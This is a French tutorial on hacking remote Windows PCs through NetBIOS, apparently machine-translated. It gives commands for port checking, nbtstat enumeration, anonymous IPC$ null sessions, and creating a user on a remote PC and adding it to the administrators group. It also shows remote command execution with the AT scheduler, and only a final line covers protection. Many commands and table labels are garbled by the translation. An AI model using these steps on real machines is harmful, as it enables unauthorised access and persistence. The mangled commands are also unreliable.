Piratage avec NetBIOS

Ce site Web montrera différentes façons d’obtenir autant de données que possible vers un PC distant à l’aide de NetBIOS.

La première chose à faire est de vérifier que le port NetBIOS est ouvert sur l’ordinateur auquel nous voulons nous connecter, le port est le 139; peut être effectué à l’aide de la file d’attente MSDOS avec cette commande: ADRESSE TELNET 139 et s’il se connecte, il l’ouvrira et sinon, cherchez un autre PC.

La deuxième chose la plus importante est d’avoir le Tableau NetBios, qui nous dira quels services l’ordinateur distant a en cours d’exécution que nous vérifierons avec les résultats obtenus avec les commandes ultérieures

Nom	Suffixe	Mec	Service
<nomordinateur>	00	Ou	Service de poste de travail
<nomordinateur>	01	Ou	Service de messagerie
<_MSBROWSE_>	01	G	Navigateur principal
<nomordinateur>	03	Ou	Service de messagerie
<nomordinateur>	06	Ou	Service de serveur RAS
<nomordinateur>	1F	Ou	NetDDE Service
<nomordinateur>	20	Ou	Service de serveur de fichiers
<nomordinateur>	21	Ou	Service à la clientèle RAS
<nomordinateur>	22	Ou	Échange d’échange
<nomordinateur>	23	Ou	Boutique Exchange
<nomordinateur>	24	Ou	Annuaire Exchange
<nomordinateur>	30	Ou	Service de partage de modem
<nomordinateur>	31	Ou	Service client de partage de modem
<nomordinateur>	43	Ou	Contrôle à distance du client SMS
<nomordinateur>	44	Ou	Outil de contrôle à distance SMS Admin
<nomordinateur>	45	Ou	Chat à distance du client SMS
<nomordinateur>	46	Ou	Transfert à distance du client SMS
<nomordinateur>	4C	Ou	DEC Pathworks TCPIP Service
<nomordinateur>	52	Ou	DEC Pathworks TCPIP Service
<nomordinateur>	87	Ou	Échange MTA
<nomordinateur>	6À	Ou	Échange IMC
<nomordinateur>	ABEILLE	Ou	Agent du Moniteur réseau
<nomordinateur>	BF	Ou	Applications de surveillance du réseau
<nom d’utilisateur>	03	Ou	Service de messagerie
<Domaine>	00	G	Nom de domaine
<Domaine>	1B	Ou	Navigateur maître de domaine
<Domaine>	1C	G	Contrôleurs de domaine
<Domaine>	1D	Ou	Navigateur principal
<Domaine>	1Et	G	Choix du service de navigation
<INet~Services>	1C	G	Serveur d’information Internet
<EST~Computer_name>	00	Ou	Serveur d’information Internet

Avec cette commande MSDOS, nous serons en mesure de savoir quels services la machine distante exécute: nbtstat -A ADRESSE ou nbtstat -a PCNAME. En dehors de cela, il nous donnera également l’adresse MAC Au cas où nous serions intéressés.

Comme nous pouvons le voir sur l’image, nous faisons un NBTSTAT à une adresse IP ou à un nom PCNAME et nous donne ces résultats, que nous les comparons avec la table NetBIOS et que nous obtiendrons des données juteuses en tant qu’utilisateur, au domaine qui lui appartient… et s’il s’agissait d’un contrôleur de domaine, nous verrions les services qu’il exécute.

Pour établir ce que l’on appelle Vide session, Nous devons exécuter cette commande: utilisation nette DIRECCIONIPIPC$ “”/ou:”” . Ce que cette commande fait en réalité, c’est s’authentifier auprès du PC distant avec l’utilisateur Anonyme.

Pour s’authentifier sur un ordinateur distant avec un utilisateur spécifique: net use ADRESSE /u:NOM D’UTILISATEUR MOT DE PASSE ou utilisation nette ADRESSEIPC$ /u:NOM D’UTILISATEUR MOT DE PASSE ou net use ADDRESSIPRESOURCE /u:NOM D’UTILISATEUR MOT DE PASSE… Une fois authentifié auprès de l’hôte distant pour afficher le contenu du dossier, vous pouvez faire vue nette ADRESSE et nous verrons le contenu via MSDOS, Mais vous pouvez aussi faire, COMMENCEMENT > EXECUTE et vous mettez ce que vous voulez: ADDRESSIP ou IPADDRESS et vous montrera avec la fenêtre de l’Explorateur Windows le contenu.

Voir l’heure à distance: temps net ADRESSE
Voir les domaines disponibles: Vue du réseau / Domaine
Afficher les ordinateurs d’un domaine spécifique: Vue du réseau / Domaine:BUJARRA
Afficher les utilisateurs d’une équipe: Utilisateur d’Internet
Afficher les détails d’un utilisateur: Nom d’utilisateur Net User
Créer un utilisateur: net user nom d’utilisateur mot de passe /ADD (Idéal pour créer un utilisateur sur un PC distant avec la commande AT)
Supprimer un utilisateur: nom d’utilisateur net /DELETE
Afficher des groupes sur un PC: Groupe Net
Mettre un utilisateur dans un groupe: net groupe nomgroupenom d’utilisateur /ADD (Idéal pour regrouper les administrateurs dans l’utilisateur que nous avons créé à distance sur un PC)
Supprimer un utilisateur d’un groupe: Nom du groupe netNom d’utilisateur du groupe /SUPPRIMER

Commander À, pour exécuter des choses à distance. Avec la commande fr DIRECCIONIP Nous verrons les tâches planifiées de votre équipe et avec la commande fr DIRECCIONIP 21:30 /INTERACTIF “Commande MSDOS à exécuter sur le PC distant”. Dans la commande précédente, le 21:30 c’est le moment où j’ai défini la commande MSDOS à exécuter qui va entre guillemets, afin que vous puissiez mettre n’importe quand, Mais d’abord, regardez mieux à quelle heure il a!

L’outil MS Windows Resource Kit nltest.rar Affiche les contrôleurs de domaine d’un domaine particulier, exemple:
C:>nltest /dclist:bujarra.com
Liste des DCS pof dans le domaine bujarra.com
bujarra01

Séries intéressantesVers le programme Nbtscan Ce qu’il fait est un 'nbtstat’ d’un réseau entier à une vitesse impressionnante. Exemple:

C:>nbtscan 192.168.0.0/24
&nbspEffectuer une recherche de nom NBT pour les adresses de 192.168.0.0/24
&nbspAdresse IP &nbspServeur NetBIOS &nbspServeur &nbspUtilisateur &nbspAdresse MAC
&nbsp—————————————————————————–
&nbsp192.168.0.0 &nbspSendto a échoué: Impossible d’attribuer l’adresse demandée
&nbsp192.168.0.1 &nbspBUJARRA01 <Serveur> <inconnu> &NBSP00-E0-7D-78-11-E6
&nbsp192.168.0.13 &nbspMARIA <Serveur> &nbspMARIA &NBSP00-E0-7D-76-5A-2B
&nbsp192.168.0.55 &nbspVICETOPC <Serveur> &nbspVICETO 00-00-f8-30-fa-23
&nbsp192.168.0.100 &nbspRecvfrom failed: Réinitialisation de la connexion par l’homologue

Pour Protéger de ce type d’attaque il faut soit fermer le port 139 sur le routeur, soit nous activerons le pare-feu dans XP, soit nous supprimerons le service de partage de dossiers et d’imprimantes pour les réseaux Microsoft (dans n’importe quel S.O. de Microsoft).